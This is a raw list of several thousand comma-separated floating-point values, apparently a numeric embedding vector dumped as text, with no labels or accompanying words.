0.0024596434086561203, 0.007989044301211834, 0.029346883296966553, -0.040275219827890396, -0.0029815020971000195, 0.010552291758358479, -0.011005081236362457, -0.008165555074810982, -0.03269292041659355, -0.011557637713849545, -0.030728274956345558, 0.007636022288352251, -0.01815761625766754, 0.052799832075834274, -0.011112522333860397, 0.01539483480155468, 0.02609294094145298, 0.02388271503150463, -0.006335212383419275, 0.0017430467996746302, -0.0037239997182041407, -0.011189267039299011, 0.010383455082774162, -0.008342066779732704, 0.013338097371160984, -0.011473218910396099, -0.03653011471033096, -0.012025775387883186, 0.026599450036883354, -0.014949719421565533, -0.018449243158102036, 0.0038180111441761255, 0.016668783500790596, -0.02555573172867298, 0.03051339089870453, 0.00495765870437026, -0.0016125821275636554, -0.025617128238081932, -0.002950804540887475, 0.0027934794779866934, -0.008372764103114605, -0.014734837226569653, -0.014366465620696545, -0.010291362181305885, -0.022240394726395607, -0.003455396043136716, -0.042700327932834625, -0.017205990850925446, 0.012716471217572689, 0.024772943928837776, -0.02727479673922062, -0.004113475326448679, -0.006285328883677721, 0.011741823516786098, 0.002428945852443576, 0.012962051667273045, -0.030712924897670746, 0.0016567098209634423, -0.01766645535826683, 0.03293849900364876, -0.03063618205487728, 0.0449412539601326, -0.02251667156815529, -0.01847994141280651, 0.03901661932468414, -0.025402244180440903, -0.026277124881744385, -0.012256007641553879, -0.024174341931939125, -0.002233248669654131, 0.013867630623281002, -0.024020854383707047, -0.03068222850561142, -0.02480364218354225, -0.036223139613866806, -0.020275749266147614, 0.021641790866851807, -0.012716471217572689, 0.007858579978346825, -0.03333756700158119, 0.0008235584245994687, 0.0039024294819682837, -0.03376733511686325, 0.013299725018441677, 0.019001800566911697, -0.001145403366535902, -0.003029467072337866, 0.000872003030963242, 0.0074556740000844, -0.011480893939733505, 0.01884831115603447, -0.0020049354061484337, -0.005241611041128635, -0.006788001861423254, -0.08969832211732864, -0.0029565603472292423, -0.00675346702337265, -0.008311368525028229, 0.008088811300694942, 0.04417381435632706, 0.01771250180900097, -0.027213402092456818, -0.015440881252288818, -0.003814173862338066, -0.029638510197401047, -0.010721128433942795, 0.011926008388400078, -0.013199958018958569, -0.027105960994958878, -0.014259024523198605, 0.0037949879188090563, -0.030605483800172806, 0.001309443498030305, 0.02900920994579792, -0.007777998689562082, -0.0018082790775224566, -0.00518405344337225, -0.00280307256616652, 0.00805043987929821, 0.019922727718949318, -0.016545994207262993, 0.019370170310139656, -0.0024519688449800014, 0.025678522884845734, 0.013982745818793774, 0.012002752162516117, 0.0089943902567029, -0.005145681090652943, 0.01226368173956871, 0.004692892078310251, 0.037144068628549576, -0.028318515047430992, -0.009032761678099632, 0.013906002044677734, 0.0009468283969908953, 0.010460198856890202, -0.022439928725361824, -0.012754842638969421, 0.003927370999008417, -0.013253678567707539, 0.000427607650635764, 0.025970149785280228, -0.0018869416089728475, 0.003745104419067502, 0.014627395197749138, -0.01352995727211237, 0.04487985745072365, -0.013737165369093418, 0.0014840359799563885, -0.010137874633073807, -0.0019636854995042086, -0.01171880029141903, 0.02392876148223877, 0.005690563470125198, 0.0072983489371836185, -0.015463904477655888, 0.014819255098700523, -0.034105006605386734, -0.021304117515683174, -0.02317667007446289, -0.001803482649847865, -0.0016202564584091306, -0.0013622050173580647, 0.015517625026404858, -0.0015377567615360022, -0.002705223858356476, 0.0016020297771319747, 0.012248333543539047, 0.02549433708190918, 0.012954377569258213, 0.019324123859405518, -0.021135281771421432, 0.02679898403584957, -0.013192283920943737, -0.03431989252567291, -0.00958531815558672, -0.004232428502291441, 0.026016196236014366, -0.03278501331806183, -0.023944109678268433, 0.0006902158493176103, -0.013714142143726349, 0.018879009410738945, 0.010414153337478638, -0.010621361434459686, -0.0010302874725311995, -0.0013487747637555003, -0.013192283920943737, -0.022762253880500793, 0.011580660939216614, 0.020782260224223137, 0.08847041428089142, 0.03336826711893082, -0.027904096990823746, -0.00455091567710042, -0.026752937585115433, -0.0076513709500432014, 0.010982058010995388, 0.013330422341823578, 0.030283158645033836, 0.0037604530807584524, 0.008863925002515316, -0.004194056615233421, 0.00615870114415884, 0.017789246514439583, -0.015249021351337433, 0.006396607495844364, 0.01037578098475933, -0.001454297685995698, -0.001779500162228942, 0.013882978819310665, -0.010675081983208656, 0.021703187376260757, 0.017835291102528572, -0.00853392668068409, -0.00805043987929821, -0.01960040256381035, -0.0029412114527076483, 0.005498703569173813, -0.025954801589250565, -0.005356727167963982, -0.008150206878781319, -0.005602307617664337, 0.004017545375972986, -0.004669868852943182, 0.017620408907532692, 0.010038107633590698, -0.00239632953889668, -0.02577061578631401, 0.008840901777148247, -0.009754154831171036, 0.010813221335411072, -0.004961495753377676, -0.00410580076277256, 0.0069414894096553326, -0.011588335037231445, 0.0042784749530255795, 0.0029815020971000195, 0.021319467574357986, 0.035025935620069504, -0.01185693871229887, 0.009892294183373451, -0.023268762975931168, 0.011143220588564873, 0.05233936756849289, -0.01803482696413994, -0.014819255098700523, -0.017697153612971306, -0.011910660192370415, 0.0029738277662545443, 0.0013372631510719657, 0.017298083752393723, -0.0017065934371203184, 0.0218720231205225, 0.025432942435145378, -0.014811581000685692, -0.0024692362640053034, 0.01274716854095459, 0.005118820816278458, 0.010690431110560894, 0.026215730234980583, -0.01566343940794468, -0.012632052414119244, -0.005172541830688715, 0.0010063049849122763, 0.02501852437853813, 0.011895311065018177, -0.025049222633242607, 0.01547157857567072, -0.029623162001371384, -0.010928337462246418, -0.008879274129867554, 0.019631100818514824, -0.02268550917506218, -0.029899438843131065, -0.00046382119762711227, 0.02480364218354225, 0.0034419656731188297, 0.006599979009479284, 0.024082249030470848, -0.020398540422320366, 0.00007746341725578532, -0.02047528326511383, 0.008081137202680111, 0.002705223858356476, 0.016223669052124023, 0.0017324944492429495, 0.011365777812898159, 0.017697153612971306, -0.013345771469175816, -0.00045806539128534496, -0.012309728190302849, 0.027152007445693016, -0.007801021449267864, 0.009286017157137394, -0.009309040382504463, 0.01863342896103859, 0.0012115950230509043, 0.006016725208610296, 0.0011578742414712906, 0.01415158249437809, -0.023268762975931168, 0.0009818427497521043, 0.012601355090737343, -0.022439928725361824, -0.013806235045194626, -0.02911665104329586, 0.0017056340584531426, 0.0034707447048276663, 0.005943818483501673, -0.0028548745904117823, -0.017758548259735107, -0.0005050710751675069, 0.026077590882778168, -0.008817878551781178, 0.029561765491962433, -0.012854610569775105, -0.0005137047846801579, -0.008065788075327873, 0.02474224753677845, 0.020122261717915535, 0.0031791178043931723, -0.0044511486776173115, 0.009193924255669117, -0.0031695247162133455, 0.03923150151968002, -0.041840795427560806, 0.02512596733868122, -0.005844051018357277, 0.02501852437853813, -0.010314385406672955, -0.0009501859312877059, 0.023575738072395325, 0.01123531349003315, 0.011150894686579704, 0.0449412539601326, 0.01794273406267166, -0.0014936289517208934, 0.0337059386074543, 0.035025935620069504, 0.001445663976483047, -0.009140203706920147, -0.01256298366934061, 0.0038199296686798334, 0.035240817815065384, 0.0048348684795200825, -0.0060934689827263355, 0.0022025511134415865, -0.0252794548869133, -0.02555573172867298, 0.03662220761179924, -0.0028798163402825594, 0.008457181975245476, 0.039630573242902756, 0.005771144293248653, 0.011028104461729527, 0.012087170965969563, -0.009662061929702759, -0.03496453911066055, -0.02538689598441124, -0.017436223104596138, -0.001086886040866375, 0.020490633323788643, -0.04408172145485878, -0.016070181503891945, 0.017727850005030632, -0.004911612253636122, 0.0038007437251508236, -0.010245316661894321, -0.0061855618841946125, -0.013238330371677876, 0.02096644416451454, 0.004374404903501272, -0.016192970797419548, -0.008979041129350662, 0.048809148371219635, -0.0061855618841946125, 0.026921775192022324, 0.02446596883237362, -0.03398221731185913, 0.006009050644934177, -0.008917645551264286, 0.028717583045363426, -0.02750502899289131, -0.008411136455833912, -0.02834921143949032, 0.02928548865020275, 0.0006350561161525548, -0.012279030866920948, 0.01501878909766674, -0.0021507488563656807, 0.01501878909766674, 0.0039043480064719915, -0.015387160703539848, -0.006895442958921194, 0.023591088131070137, -0.03536360710859299, -0.006223933771252632, 0.009700434282422066, -0.027535725384950638, 0.010268338955938816, 0.010644384659826756, -0.014750185422599316, 0.005652191117405891, 0.019799936562776566, 0.024005504325032234, 0.0049538216553628445, 0.029423628002405167, -0.03020641580224037, -0.020505981519818306, 0.011926008388400078, 0.014658092521131039, 0.017543664202094078, -0.004362893290817738, 0.015049487352371216, 0.0072714886628091335, 0.012455541640520096, 0.024112947285175323, -0.012102519161999226, -0.008748809807002544, -0.0002935455704573542, 0.000992874731309712, 0.002127725863829255, 0.011941357515752316, 0.011895311065018177, 0.013906002044677734, -0.0035033610183745623, 0.001547349733300507, -0.004236265551298857, 0.01185693871229887, -0.04641473665833473, -0.03364454582333565, -0.006216259207576513, -0.00961601547896862, 0.00005462010085466318, -0.018280407413840294, -0.00027675784076564014, 0.025847358629107475, 0.02744363434612751, 0.006672885734587908, 0.02939292974770069, -0.011603684164583683, 0.003936964087188244, 0.013330422341823578, 0.007256139535456896, -0.004378241952508688, 0.017359480261802673, 0.020014820620417595, -0.0335831493139267, 0.03284640610218048, -0.03431989252567291, 0.02118132822215557, -0.00495765870437026, -0.00907880812883377, 0.006841722410172224, -0.019109241664409637, 0.007332883775234222, -0.029838044196367264, 0.004297660663723946, -0.015763206407427788, -0.004815682303160429, -0.014381814748048782, 0.014665767550468445, -0.01923203095793724, -0.03880173712968826, 0.002933537121862173, 0.029531069099903107, -0.004270800389349461, -0.028333863243460655, -0.014573674649000168, -0.00046406101319007576, -0.012892981991171837, 0.009393458254635334, -0.01145019568502903, -0.013199958018958569, 0.012378797866404057, 0.02009156346321106, -0.0028414444532245398, -0.014642744325101376, 0.005966841243207455, -0.010820895433425903, 0.0019262729911133647, -0.00018478502170182765, -0.0149113480001688, -0.028226422145962715, -0.011849264614284039, -0.007647533901035786, -0.015463904477655888, -0.0020337144378572702, -0.021795280277729034, -0.02446596883237362, 0.03333756700158119, 0.009853921830654144, 0.006761141121387482, -0.020122261717915535, -0.008602995425462723, 0.02349899522960186, -0.02107388712465763, -0.00915555190294981, 0.010713454335927963, -0.0103681068867445, 0.04263893514871597, -0.03456547111272812, -0.021242722868919373, 0.00479265907779336, 0.0057097491808235645, 0.014995765872299671, -0.02171853557229042, 0.031894780695438385, -0.013522282242774963, -0.005414285231381655, 0.01998412236571312, 0.014251349493861198, -0.011388801038265228, -0.0018447324400767684, -0.011089499108493328, -0.007497882936149836, 0.0038103368133306503, 0.023422250524163246, 0.003695220686495304, -0.011626707389950752, 0.01417460571974516, 0.013798560947179794, -0.027581771835684776, 0.016929714009165764, -0.007620673626661301, -0.004343707114458084, -0.013476235792040825, 0.032109666615724564, -0.0036933021619915962, 0.0029603976290673018, -0.014289721846580505, 0.038863133639097214, -0.02365248277783394, 0.0010168572189286351, -0.01002275850623846, 0.014351117424666882, -0.0037796390242874622, 0.008019741624593735, -0.004999867640435696, -0.004949984140694141, -0.052216578274965286, 0.005767307244241238, -0.021242722868919373, -0.006005213595926762, 0.009255318902432919, 0.012087170965969563, 0.03570128232240677, -0.010866941884160042, -0.0163157619535923, -0.01917063631117344, -0.01712924800813198, -0.010391130112111568, -0.006496374495327473, -0.013936699368059635, -0.030221763998270035, 0.020736213773489, -0.018387848511338234, -0.0004542281967587769, -0.003936964087188244, -0.036161746829748154, -0.017512967810034752, -0.01452762819826603, -0.01998412236571312, -0.003986847586929798, -0.023314809426665306, -0.009032761678099632, 0.037021275609731674, 0.007171721197664738, -0.004243940114974976, 0.008779507130384445, 0.003017955459654331, -0.01042182743549347, -0.003104292554780841, -0.006208585109561682, -0.005038239993155003, -0.003541732905432582, -0.01131973136216402, 0.008572298102080822, -0.015609717927873135, -0.015579020604491234, -0.024726897478103638, -0.0034285355359315872, -0.013445538468658924, 0.03226315230131149, -0.010521594434976578, -0.0018495289841666818, 0.026277124881744385, -0.0009137325687333941, -0.019892029464244843, -0.00023454867186956108, 0.012931354343891144, 0.005168704316020012, -0.004685217514634132, 0.018387848511338234, -0.007873928174376488, 0.01582460105419159, -0.02219434827566147, -0.03355245292186737, -0.001317117945291102, -0.011810892261564732, 0.022977136075496674, 0.013161585666239262, 0.017528316006064415, -0.00699521042406559, 0.008242299780249596, 0.020935747772455215, -0.00821160152554512, -0.009853921830654144, 0.02263946272432804, 0.014420186169445515, 0.002555573359131813, 0.011028104461729527, 0.0014427860733121634, -0.013161585666239262, 0.014443209394812584, -0.000983281759545207, 0.0253408495336771, -0.016453901305794716, 0.02727479673922062, 0.03404361382126808, 0.0009986305376514792, 0.019001800566911697, -0.010598338209092617, 0.027474330738186836, -0.011626707389950752, -0.009209273383021355, -0.01145019568502903, 0.00001761213570716791, -0.0050075422041118145, -0.026829682290554047, 0.02598549798130989, -0.010797872208058834, -0.03809569403529167, 0.016407854855060577, 0.01869482360780239, 0.009516248479485512, -0.005306843668222427, 0.004098126664757729, 0.014811581000685692, 0.009147877804934978, 0.012455541640520096, -0.006250794045627117, -0.0002626081695780158, 0.013384143821895123, -0.007593812886625528, -0.0007597650401294231, 0.026722241193056107, 0.009976712055504322, -0.012762517668306828, -0.0076820687390863895, 0.014489255845546722, -0.01445088442414999, -0.005172541830688715, -0.0047427755780518055, 0.01955435611307621, 0.014650418423116207, 0.00016787736967671663, -0.01277786586433649, -0.014266698621213436, -0.018863661214709282, 0.02004551701247692, 0.003257780335843563, -0.00024090403167065233, -0.011734148487448692, 0.0011789788259193301, 0.003791150636970997, 0.009554620832204819, -0.005679051857441664, 0.009592992253601551, -0.0008830349543131888, 0.001923395087942481, 0.0020912725012749434, -0.02759712189435959, -0.010943685658276081, -0.011074150912463665, 0.039507780224084854, 0.012409495189785957, 0.005398936104029417, -0.006983698811382055, 0.005740446969866753, -0.006128003820776939, 0.004124986939132214, -0.015225998125970364, 0.005936143919825554, -0.0006873379461467266, -0.007551603950560093, -0.0022121442016214132, 0.007451836951076984, 0.02425108477473259, -0.011189267039299011, -0.014036467298865318, 0.008963692001998425, 0.011442521587014198, -0.004646845627576113, -0.0031426644418388605, -0.03241664171218872, 0.010122525505721569, -0.009332063607871532, 0.0026572588831186295, 0.0057366094551980495, 0.0024769108276814222, 0.012401821091771126, -0.008096485398709774, 0.013929025270044804, -0.0032961522229015827, 0.00003117722735623829, 0.02030644752085209, 0.01685296930372715, 0.006281491834670305, -0.025632476434111595, -0.005548587068915367, 0.008165555074810982, 0.0072407908737659454, -0.02096644416451454, -0.019001800566911697, -0.0048885890282690525, -0.007371255662292242, -0.008395787328481674, -0.015195300802588463, 0.007808696012943983, 0.002290806733071804, -0.013276701793074608, -0.008173230104148388, -0.04417381435632706, -0.0036721976939588785, 0.0015406346647068858, 0.035240817815065384, -0.013437864370644093, 0.006507886108011007, 0.0012384554138407111, 0.022869694977998734, -0.016868317499756813, 0.012839261442422867, 0.00229464378207922, 0.00523777399212122, -0.018126919865608215, 0.004911612253636122, -0.029485022649168968, -0.0007674394291825593, -0.002404003869742155, -0.013054144568741322, -0.010713454335927963, 0.00473893852904439, -0.00014989050396252424, -0.002684119390323758, 0.011127871461212635, 0.010291362181305885, 0.008825553581118584, -0.023053880780935287, -0.037573833018541336, -0.02356038987636566, 0.00083027349319309, 0.004266963340342045, -0.0001193728021462448, -0.02052132971584797, -0.004182545002549887, 0.0018946160562336445, -0.0010830488754436374, -0.01093601156026125, -0.005763470195233822, 0.006895442958921194, -0.00719858193770051, 0.017896687611937523, 0.009209273383021355, -0.0015300823142752051, 0.0029987695161253214, -0.03235524520277977, -0.010698105208575726, 0.02577061578631401, -0.011304382234811783, 0.023130623623728752, -0.0007281081634573638, -0.01895575411617756, -0.01126601081341505, 0.0009089360828511417, -0.009523923508822918, 0.002985339378938079, -0.012916005216538906, -0.012823912315070629, -0.014197628945112228, -0.005429633893072605, -0.0060013760812580585, 0.003163768909871578, -0.010007410310208797, -0.015855297446250916, -0.010444850660860538, -0.022654810920357704, 0.003351791761815548, -0.005690563470125198, 0.033890124410390854, 0.026860378682613373, 0.005333703942596912, -0.017037155106663704, -0.002164179226383567, -0.007958346977829933, 0.011703451164066792, 0.02026040107011795, 0.016668783500790596, -0.01955435611307621, 0.0017382502555847168, 0.009746480733156204, -0.01884831115603447, -0.004224753938615322, 0.002421271288767457, -0.010590664111077785, 0.009646713733673096, 0.030559437349438667, -0.00036573284887708724, -0.004374404903501272, -0.03385942801833153, 0.00456626433879137, 0.0075055574998259544, 0.007839393801987171, 0.023790622130036354, -0.0131769347935915, 0.004408939275890589, 0.012578331865370274, -0.015003440901637077, -0.022869694977998734, 0.003601209493353963, 0.018280407413840294, 0.0008278752793557942, 0.03419709950685501, 0.0008417851058766246, 0.0015204893425107002, 0.023591088131070137, -0.013921351172029972, -0.008871600031852722, -0.015901343896985054, -0.004850217141211033, 0.010490897111594677, -0.008526251651346684, 0.017037155106663704, -0.0010494734160602093, -0.007329046260565519, -0.015049487352371216, -0.009431830607354641, 0.005383587442338467, 0.00247882935218513, 0.006465677171945572, 0.0075362552888691425, 0.012939028441905975, 0.005617656745016575, 0.010160897858440876, 0.000286590657196939, -0.01498809177428484, -0.03536360710859299, -0.005157192703336477, 0.005617656745016575, 0.00590160908177495, 0.006262305658310652, -0.013852281495928764, 0.0036587673239409924, -0.006043585482984781, 0.009815550409257412, 0.001598192611709237, 0.017098549753427505, 0.010905314236879349, -0.0007803899352438748, 0.004750450141727924, -0.004831030964851379, 0.014780882745981216, 0.013675770722329617, 0.006085794419050217, 0.008042764849960804, 0.0005491988267749548, -0.013721817173063755, -0.00723695382475853, -0.0037796390242874622, 0.006024399306625128, -0.011028104461729527, -0.0033383613917976618, 0.020997142419219017, -0.0019349065842106938, -0.011312057264149189, -0.010790198110044003, -0.0011242987820878625, -0.004401265177875757, -0.005579284392297268, -0.00615870114415884, -0.005103472154587507, -0.01689901575446129, 0.0008024538401514292, -0.006101143546402454, -0.012939028441905975, -0.029515719041228294, -0.002950804540887475, 0.010283688083291054, 0.015003440901637077, -0.0013161585666239262, 0.00730602303519845, 0.008503228425979614, 0.012256007641553879, 0.007463348098099232, -0.008840901777148247, 0.02500317618250847, 0.021150629967451096, 0.020812956616282463, -0.011150894686579704, -0.006250794045627117, 0.013875304721295834, -0.005356727167963982, 0.016024135053157806, 0.0029546418227255344, 0.029745951294898987, 0.014596697874367237, -0.02890176884829998, -0.004800333641469479, 0.005341378506273031, 0.018019476905465126, -0.005533238407224417, 0.010414153337478638, -0.01547925267368555, -0.019308775663375854, -0.010498571209609509, 0.009930665604770184, -0.007382767274975777, -0.004831030964851379, -0.01052926853299141, 0.002453887602314353, 0.02062877081334591, -0.004355218727141619, 0.022117603570222855, 0.01182624138891697, -0.000026605564926285297, 0.006293002981692553, 0.0037182439118623734, -0.009339737705886364, -0.0003825205785688013, -0.008027416653931141, 0.012578331865370274, 0.014796231873333454, 0.0017430467996746302, 0.012593680992722511, -0.0007194744539447129, -0.024880385026335716, -0.01884831115603447, 0.010107177309691906, -0.002555573359131813, 0.022915741428732872, -0.010030433535575867, 0.0033556288108229637, 0.00012201087520224974, 0.006584630347788334, 0.019845983013510704, 0.014289721846580505, -0.014849952422082424, 0.012018101289868355, 0.0015003440203145146, 0.0030237112659960985, 0.0024845851585268974, 0.010107177309691906, -0.010575314983725548, -0.006929977796971798, 0.022347835823893547, -0.0019895867444574833, 0.0024653992149978876, -0.023974807932972908, -0.004708240740001202, -0.00015336797514464706, -0.0030467344913631678, -0.010337408632040024, 0.013890653848648071, 0.0012979318853467703, 0.0012048798380419612, -0.02480364218354225, 0.0075631155632436275, -0.015625067055225372, 0.017037155106663704, -0.005276145879179239, 0.01706785336136818, -0.005544749554246664, 0.007144860923290253, -0.0018006047466769814, 0.00009329185559181497, -0.0045048692263662815, 0.014059490524232388, 0.0016154599143192172, 0.017896687611937523, -0.021165980026125908, 0.010928337462246418, -0.0016663027927279472, 0.010744151659309864, -0.0013075248571112752, -0.007858579978346825, 0.005233936943113804, -0.01193368248641491, -0.024235736578702927, 0.002463480457663536, 0.00615870114415884, 0.00010977980855386704, -0.006626839283853769, -0.007194744423031807, 0.01777389645576477, 0.02722875028848648, -0.01577855460345745, -0.02064412087202072, 0.018940404057502747, 0.014711814001202583, 0.006335212383419275, 0.004999867640435696, 0.014274372719228268, -0.015916693955659866, -0.005732772406190634, 0.00036909038317389786, 0.006918466184288263, -0.02111993357539177, -0.013921351172029972, 0.0075592780485749245, 0.0020126099698245525, 0.011020430363714695, -0.03074362315237522, 0.008610670454800129, 0.014750185422599316, 0.013798560947179794, -0.017620408907532692, -0.013315074145793915, -0.009032761678099632, 0.004880914464592934, -0.007309860549867153, -0.025632476434111595, 0.01663808710873127, 0.012041124515235424, 0.004823356866836548, -0.006553932558745146, 0.007378929760307074, -0.010851593688130379, -0.020245051011443138, 0.021411560475826263, 0.00425545172765851, -0.01593204215168953, -0.001154037076048553, 0.01306949369609356, -0.006542420946061611, 0.007309860549867153, -0.027689214795827866, -0.0044511486776173115, -0.0008676861762069166, 0.0103988042101264, -0.0016308088088408113, 0.021918069571256638, 0.018433894962072372, 0.006864745635539293, -0.0011559556005522609, 0.0132076321169734, -0.0027934794779866934, 0.015195300802588463, -0.022777602076530457, -0.015640415251255035, 0.001538716023787856, 0.019431566819548607, 0.004021382424980402, 0.004984518978744745, -0.006599979009479284, -0.0036626046057790518, 0.017359480261802673, -0.004666031803935766, -0.00864136777818203, -0.022823648527264595, -0.005191727541387081, -0.010352757759392262, 0.022700857371091843, 0.004339870065450668, -0.0073866043239831924, 0.009754154831171036, 0.009147877804934978, 0.009170901030302048, -0.008134857751429081, -0.03349105641245842, 0.019093893468379974, 0.017083201557397842, 0.0018466510809957981, 0.0017996454844251275, -0.003017955459654331, -0.010905314236879349, -0.015011114999651909, -0.006388932932168245, 0.027458982542157173, 0.024604108184576035, 0.00634672399610281, -0.01534111425280571, 0.031894780695438385, -0.006772652734071016, 0.002089353743940592, 0.019247381016612053, 0.015156928449869156, -0.012148565612733364, -0.01663808710873127, -0.010084154084324837, 0.01949296146631241, 0.0024692362640053034, -0.020199004560709, 0.0069414894096553326, 0.015164602547883987, 0.04061289504170418, 0.000049104131903732195, 0.0027340028900653124, 0.0015617392491549253, 0.0020548191387206316, 0.02965385839343071, 0.025248756632208824, 0.005356727167963982, 0.003113885410130024, -0.015855297446250916, 0.04899333417415619, 0.015064835548400879, -0.019539007917046547, -0.013622049242258072, 0.003986847586929798, 0.015594368800520897, 0.011680427938699722, 0.012463215738534927, 0.002609293907880783, 0.0033076638355851173, 0.003250106004998088, -0.026676194742321968, 0.00549486605450511, -0.0009487469797022641, -0.00247882935218513, -0.004761961754411459, 0.0034170239232480526, 0.012593680992722511, 0.015164602547883987, -0.005264634266495705, -0.004992193542420864, -0.013338097371160984, 0.0014216814888641238, -0.007812533527612686, -0.02150365151464939, 0.029853392392396927, 0.04515613615512848, -0.024051550775766373, 0.0007909422274678946, -0.008833227679133415, -0.0015291230520233512, 0.0006820617709308863, -0.0003043377073481679, -0.0008576135733164847, 0.011442521587014198, 0.010091828182339668, 0.0031867921352386475, -0.017482269555330276, -0.010283688083291054, -0.008035090751945972, 0.0013017691671848297, -0.015156928449869156, 0.007375092711299658, 0.0052991691045463085, 0.03046734444797039, 0.010598338209092617, -0.003278884803876281, -0.01680692285299301, 0.007896951399743557, 0.023683181032538414, -0.005491029005497694, 0.003666441887617111, -0.007501720450818539, -0.0018111569806933403, 0.0067419554106891155, 0.011335080489516258, -0.02171853557229042, -0.017466921359300613, 0.020567376166582108, -0.011434847488999367, 0.011081825010478497, 0.027719911187887192, 0.0039024294819682837, -0.010897640138864517, -0.013315074145793915, 0.003850627224892378, 0.004174870438873768, -0.004949984140694141, -0.03078966960310936, -0.002421271288767457, -0.0026054568588733673, -0.015179951675236225, -0.01593204215168953, -0.0012365367729216814, 0.0315571092069149, -0.0019454589346423745, -0.008825553581118584, -0.0315571092069149, 0.02365248277783394, 0.008226950652897358, 0.0021008653566241264, 0.0023886552080512047, 0.021488303318619728, -0.004823356866836548, 0.01570948399603367, -0.02765851654112339, -0.006929977796971798, 0.009216947481036186, 0.002198713831603527, -0.005963004194200039, 0.015632741153240204, 0.0024500503204762936, 0.006910792086273432, -0.0006998088210821152, 0.004616148304194212, 0.01749761961400509, 0.017958082258701324, 0.015333439223468304, -0.01648459956049919, -0.029776649549603462, 0.018219010904431343, 0.007428813725709915, -0.01603948324918747, 0.0358547680079937, -0.009247644804418087, -0.002283132169395685, -0.01712924800813198, 0.018786916509270668, 0.00750939454883337, -0.014535302296280861, -0.03171059489250183, -0.00140153628308326, -0.014120885170996189, -0.007283000275492668, 0.017635757103562355, -0.008311368525028229, 0.023406902328133583, -0.0019560111686587334, 0.011565311811864376, 0.007728114724159241, 0.010329734534025192, 0.014282047748565674, -0.007808696012943983, 0.0035973722115159035, 0.006538583897054195, -0.023084577172994614, 0.003873650450259447, 0.010329734534025192, -0.02705991454422474, 0.002386736683547497, 0.0024174342397600412, -0.00684555945917964, -0.007942997850477695, -0.015555997379124165, -0.0014984254958108068, 0.0015329602174460888, -0.01567111350595951, 0.001675895880907774, -0.002847200259566307, -0.005548587068915367, 0.02257806807756424, 0.010759500786662102, 0.004155684262514114, 0.036652907729148865, 0.0033498730044811964, 0.011818567290902138, -0.01445088442414999, 0.013936699368059635, -0.0016778144054114819, 0.008464857004582882, 0.01702180691063404, 0.0046238224022090435, -0.026430614292621613, 0.005268471781164408, -0.014259024523198605, -0.006058934144675732, 0.011120197363197803, 0.005502540618181229, -0.004447311628609896, 0.0010830488754436374, 0.014796231873333454, -0.02673758938908577, -0.006396607495844364, -0.007793347351253033, 0.014120885170996189, 0.012854610569775105, -0.011972054839134216, -0.0007204337744042277, 0.008687414228916168, -0.002267783507704735, 0.014420186169445515, 0.004593125078827143, -0.010621361434459686, 0.0035110353492200375, -0.002770456252619624, 0.008495554327964783, -0.007110326085239649, 0.005091960541903973, 0.007639859337359667, -0.00704893097281456, -0.009216947481036186, 0.006764978636056185, 0.005187890492379665, -0.0007578463992103934, -0.021350163966417313, 0.00861834455281496, -0.010137874633073807, -0.010153223760426044, 0.021304117515683174, 0.02263946272432804, -0.01976924017071724, 0.013929025270044804, -0.006734280847012997, 0.009324388578534126, -0.0032731289975345135, 0.0016106634866446257, 0.0033383613917976618, 0.0008000555681064725, -0.00640044454485178, 0.003488012123852968, 0.015279718674719334, -0.022823648527264595, -0.032754313200712204, 0.015793902799487114, -0.01781994290649891, -0.012432518415153027, 0.003641500137746334, -0.014719488099217415, -0.0027781305834650993, 0.026722241193056107, 0.008480205200612545, -0.009040436707437038, -0.008917645551264286, -0.005560098681598902, 0.017083201557397842, -0.036376629024744034, 0.032754313200712204, -0.029899438843131065, -0.010191595181822777, 0.011741823516786098, 0.01599343679845333, -0.008633693680167198, -0.02144225686788559, -0.004976844415068626, -0.008610670454800129, 0.01669948175549507, 0.005813353694975376, 0.0057097491808235645, -0.002737840171903372, -0.0015243265079334378, 0.007118000648915768, 0.013882978819310665, -0.007854741998016834, -0.022071557119488716, 0.023836668580770493, 0.03505663201212883, -0.008111834526062012, 0.0037777204997837543, 0.008257647976279259, -0.007620673626661301, 0.024818990379571915, -0.01093601156026125, 0.01093601156026125, -0.01680692285299301, 0.013315074145793915, 0.00815788097679615, 0.0010561884846538305, 0.0021660977508872747, 0.00410580076277256, 0.010222293436527252, -0.006684397347271442, -0.018940404057502747, 0.001805401174351573, 0.006764978636056185, -0.007478697225451469, -0.000016877671441761777, 0.012708797119557858, -0.010836244560778141, -0.0208590030670166, 0.034227799624204636, -0.00907880812883377, 0.014458558522164822, -0.012539960443973541, -0.0007919015479274094, 0.008572298102080822, -0.0011501997942104936, 0.008771832101047039, 0.0016701400745660067, 0.00630835210904479, -0.026384567841887474, -0.00907880812883377, -0.027673864737153053, -0.00409045210108161, -0.012025775387883186, 0.003445802954956889, 0.006166375707834959, -0.02036784216761589, 0.0008859128574840724, 0.008342066779732704, 0.009470202028751373, 0.023422250524163246, -0.011565311811864376, -0.011058801785111427, -0.015118556097149849, 0.03588546812534332, -0.0012605192605406046, 0.004696729127317667, -0.00821160152554512, 0.0020989468321204185, -0.0028107468970119953, 0.009961363859474659, -0.00014485418796539307, 0.006273817270994186, -0.014358791522681713, 0.008380438201129436, -0.01577855460345745, -0.005663702730089426, 0.008718111552298069, -0.01659204065799713, 0.002849118784070015, -0.008203927427530289, 0.018111569806933403, -0.004524055402725935, 0.011872287839651108, 0.012025775387883186, 0.0019464181968942285, 0.00022207778238225728, -0.009378110058605671, 0.015164602547883987, -0.002461561933159828, -0.02300783433020115, 0.011104848235845566, -0.026108289137482643, 0.0032865593675523996, 0.006811024621129036, 0.031081296503543854, -0.007720440626144409, 0.015870647504925728, 0.0131769347935915, -0.01723668910562992, -0.0010475547751411796, -0.0089943902567029, -0.012194612063467503, 0.003871731925755739, 0.007513232063502073, 0.011335080489516258, -0.011496242135763168, -0.011051127687096596, 0.0012864202726632357, -0.0007707969634793699, 0.008848576806485653, 0.02334550768136978, -0.0033460359554737806, -0.024266434833407402, 0.010337408632040024, -0.0040405686013400555, 0.0029987695161253214, 0.04260823503136635, -0.005310680717229843, -0.027152007445693016, 0.008203927427530289, 0.021964116021990776, 0.014251349493861198, 0.027105960994958878, 0.0017823780653998256, 0.003121559740975499, 0.002156504662707448, 0.013698793947696686, 0.0011051127221435308, -0.008035090751945972, 0.009193924255669117, -0.015225998125970364, -0.012701122090220451, -0.009746480733156204, 0.008111834526062012, -0.033091988414525986, 0.004228590987622738, 0.019078543409705162, -0.011864613741636276, -0.015233672223985195, 0.0011406068224459887, -0.01463506929576397, 0.00011691459803842008, 0.009662061929702759, -0.002666851971298456, 0.003353710286319256, 0.01402111817151308, 0.00910183135420084, -0.00912485457956791, -0.003027548547834158, 